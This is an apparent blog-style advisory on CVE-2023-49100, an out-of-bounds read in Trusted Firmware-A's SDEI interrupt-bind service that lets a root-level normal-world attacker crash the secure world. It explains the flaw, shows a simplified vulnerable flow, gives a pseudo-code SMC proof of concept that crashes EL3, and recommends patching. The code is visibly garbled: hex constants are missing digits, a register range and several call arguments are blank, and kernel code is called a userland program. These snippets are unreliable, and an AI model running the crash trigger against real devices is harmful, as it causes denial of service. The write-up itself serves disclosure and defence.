Published: June 2024

Introduction

In late 2023, a vulnerability labeled CVE-2023-49100 was found in Trusted Firmware-A (TF-A), a critical project powering the secure boot and higher privilege operation (EL3) on ARM-based platforms. This bug provides an out-of-bounds (OOB) memory read primitive within the Secure EL3 context, triggered through the SDEI (Software Delegated Exception Interface) service.

Although it does not leak information back to the Linux kernel or other non-secure components, it allows a compromised kernel (or root user) to crash TF-A’s secure world—potentially causing system instability or even a device reboot.

This article goes step-by-step through the issue, its exploitation, and what it means for system integrators, along with code examples and references.

What is Trusted Firmware-A and SDEI Service?

- Trusted Firmware-A (TF-A): Open-source reference code implementing ARM's Secure World firmware at EL3, responsible for secure boot, power management, SMC handling, and exception handling.
- SDEI: A mechanism for handling traffic between normal (non-secure) world and secure world for exceptional events, like firmware upgrades or hardware failures.

Origin

This vulnerability is triggered during a call to sdei_interrupt_bind. The function does not properly validate the interrupt number parameter (x1 register), which is later processed by platform functions (plat_ic_is_sgi and plat_ic_get_interrupt_type).

A malicious OS (Linux kernel) with root access could send an arbitrary interrupt number, resulting in TF-A reading memory it shouldn’t. This can cause a crash if the address is unmapped or invalid.

Code Snippet: Vulnerable Flow

Below is a simplified approximation for illustration (see the TF-A source reference):

// Called from EL3 SMC handler
uint64_t sdei_interrupt_bind(uint64_t intr_num, ...) {
    // No bounds check on 'intr_num'
    ...
    // Passes directly to platform-specific function
    uint32_t type = plat_ic_get_interrupt_type(intr_num);
    ...
}

uint32_t plat_ic_get_interrupt_type(uint32_t id) {
    // May access OOB memory based on 'id'
    if (plat_ic_is_sgi(id)) {
       // Do something
    }
    // Possibly dereferences tables or structures using 'id' as index
}

Problem:
No check ensures intr_num is within valid bounds for interrupt numbers.
A maliciously large value can cause an OOB access, potentially hitting unmapped memory.

The attacker already has kernel (or root) privileges in the normal world.

- They issue a crafted ARM SMC (Secure Monitor Call) from Linux to the EL3 firmware using any values for registers x–x6.

They set x1 (the interrupt number) very high — e.g. xFFFFFFFF — to trigger the unsafe read.

This does not let the attacker see secret data inside TF-A, because the read result remains internal.
However, Trying to read from an invalid address will crash TF-A, potentially triggering a full device reboot or entering an insecure state.

Example: Exploit in Linux Kernel

Here’s how a userland program could use the existing kernel SMC API to crash secure world (pseudo-code):

#include <linux/ioctl.h>
#include <linux/arm-smccc.h>

// These may vary across platforms
#define SDEI_INTERRUPT_BIND_FID  xC4000041

void trigger_oob() {
    struct arm_smccc_res res;
    // Pass high interrupt num
    unsigned long bad_interrupt_num = xFFFFFFFF;

    arm_smccc_smc(SDEI_INTERRUPT_BIND_FID, 
                  bad_interrupt_num, // x1
                  , , , , , , &res);

    // No output expected -- we just crashed EL3
}

This will likely cause a secure monitor exception or panic, leading to system instability or reboot.

TF-A Security Advisory:

ARM Trusted Firmware Security Center

Source Diff & Patch:

- Upstream Fix Commit (2.10)

CVE Record:

CVE-2023-49100 on Mitre

Denial of Service: System instability, abrupt reboot, loss of secure services.

- Potential Secure State Downgrade: If the platform does not handle TF-A panics gracefully, security policies could be weakened.

Mitigation:
Apply the patch from TF-A 2.10 or later, or backport the simple bounds check in sdei_interrupt_bind.

Conclusion

CVE-2023-49100 is a vivid reminder that a well-meaning service interface can have serious security risks from even basic input validation failures. With system firmware, the "attacker" is usually a compromised or malicious OS kernel. If your platform allows untrusted code in the normal world, always keep EL3 firmware up to date and audit for similar issues!

Further Reading

- TF-A SDEI Documentation
- ARM Secure Monitor Call Convention

If you run system firmware on ARM, update TF-A now!

*© 2024 – You may reference and quote this article with attribution. Direct code snippets subject to their original licenses.*

Timeline

Published on: 02/21/2024 16:15:49 UTC
Last modified on: 10/31/2024 20:35:01 UTC